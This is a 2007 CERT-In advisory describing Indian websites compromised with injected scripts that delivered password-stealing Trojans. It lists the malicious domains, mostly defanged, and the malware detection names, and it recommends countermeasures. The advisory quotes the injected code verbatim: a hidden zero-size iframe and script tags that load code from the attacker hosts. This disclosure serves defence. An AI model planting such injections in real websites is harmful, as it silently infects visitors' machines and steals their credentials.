HOME > ADVISORIES


   ADVISORIES

CERT-In Advisory CIAD-2007-14
Compromised websites propagating Malware

Download PDF version

Original issue date: March 13, 2007

Updated: March 22, 2007

Severity Rating: High

Description

It has been reported that some Indian web sites have been compromised and links to malicious websites have been injected on these websites. Certain malware such as Trojans and key loggers are being downloaded to the systems of users who visited these websites.

The compromised websites were injected with a JavaScript which was hosted on domain “www DOT smeisp DOT cn SLASH images SLASH 163 DOT js”. The script further downloads the malicious file “avp.exe” from the website “www DOT smeisp DOT cn SLASH images SLASH sina DOT htm”. Other malicious websites to which pointers have been planted by the attackers are:

“www DOT smeisp DOT cn SLASH images SLASH avp DOT exe”
“www DOT smeisp DOT cn DOT images SLASH jc DOT vbs”

Some of the compromised websites are found to be injected with Iframe through which malware is being downloaded from the malicious websites. Some more websites have been found on 21 st March 2007 which are being planted to circulate malware. These malicious websites are given below:

“http: SLASH SLASH jonnyasp DOT com SLASH 1.js
“www DOT jonnyasp DOT com SLASH test DOT exe”
“www DOT jonnyasp DOT com SLASH 014 DOT htm”
“http:SLASH SLASH 60.28.25.152 SLASH help DOT exe”
“http:SLASH SLASH www DOT google0 DOT info SLASH urchin DOT js”

The following script snippet was found on the source code of compromised web sites. (Do not click on the URLs as they may contain malware)

<iframe src="http://smeisp.cn/images/sina.htm" height=0 width=0></iframe>

<script language="javascript1.1" src="http://jonnyasp.com/1.js"></script>

<script language="JavaScript" src="http://www.google0.info/urchin.js"></script>

The websites containing the malicious Java scripts and iframes may be disinfected but other websites could be compromised and used for hosting such malware infecting the innocent user systems.

The malicious files being downloaded are detected as Infostealer.Wowcraft(Symantec), Trojan-PSW.Win32.WOW.pu(Kaspersky), TR/Crypt.FKM.Gen(AntiVir).

The malicious files found in the infected PCs are avp.exe, help.exe and test.exe as shown below:

The malicious file help.exe is detected as Trojan.PWS.WoW.AD(BitDefender), Win32/Lmir.gen(Microsoft), PWS.Win32.OnlineGames.es(Ikarus), w32/SecRisk-ProcessPatcher-Sml-based!Maximus(F-prot), Win32.g2(McAfee).

The file help.exe copies itself in the system32 folder with the name mppds.exe or mppds.dll and to make sure the file runs on every system startup it creates the following registry entry: “HKLM\Software\Microsoft\CurrentVersion\Run”.

Downloaded file avp.exe is detected as TROJ_DROPPER.CET(Trend Micro). The files dropped by the avp.exe are 1.exe detected as TROJ_MYKILL.AA(Trend Micro) and winboot.exe detected as TROJ_POSSIBLET.G (Trend Micro).

It may be noted that the malicious website keeps the updated copy of the malicious file avp.exe.

On the infected systems one file NTDETECT.exe has been found in the C: directory which is a copy of avp.exe.

Downloaded file test.exe detected as W32/PWstealer.gen1(F-Prot), Win32/Pacex.Gen(NOD32v2), MalwareScope.Worm.Viking.3(Ikarus).

The detection of the malware by some anti virus vendors as indicated by ‘Virus Total' is given below:

Activities of the malware after execution are:

•  Runs the file avp.exe and drops the malicious file 1.exe at the
location from where the avp.exe was executing.

•  Drops winboot.exe and winroot.bat file in C drive

Users are advised to implement following countermeasures:

  • Install and maintain a updated anti-virus software at gateway and desktop level
  • Keep up-to-date on patches and fixes on the operating system and application software
  • Disable active scripting even while visiting trusted web sites.
  • Set security level to Internet zone in Microsoft Internet explorer to high.
  • Block access to the malicious websites/domains at the perimeter level.

Disinfection Tools

If it is suspected that any of the above mentioned malicious files have been downloaded to user system, the following tool may be used to disinfect the systems.
ftp://download.trendmicro.com/products/pattern/spyware/fixtool/
sysclean.zip

This tool requires the latest pattern file to run. The latest pattern file may be downloaded from the following URL:
http://www.trendmicro.com/download/pattern-cpr-disclaimer.asp

References

http://isc.incidents.org/diary.html?storyid=2397 http://www.symantec.com/security_response/writeup.jsp?
docid=2005-073115-1710-99&tabid=2
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?
VName=TROJ_POSSIBLET.G

Disclaimer

The information provided herein is on "as is" basis, without warranty of any kind.

Contact Information


Phone: +91-11-24368572

Postal address

Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology
Electronics Niketan
6, C.G.O. Complex
New Delhi-110 003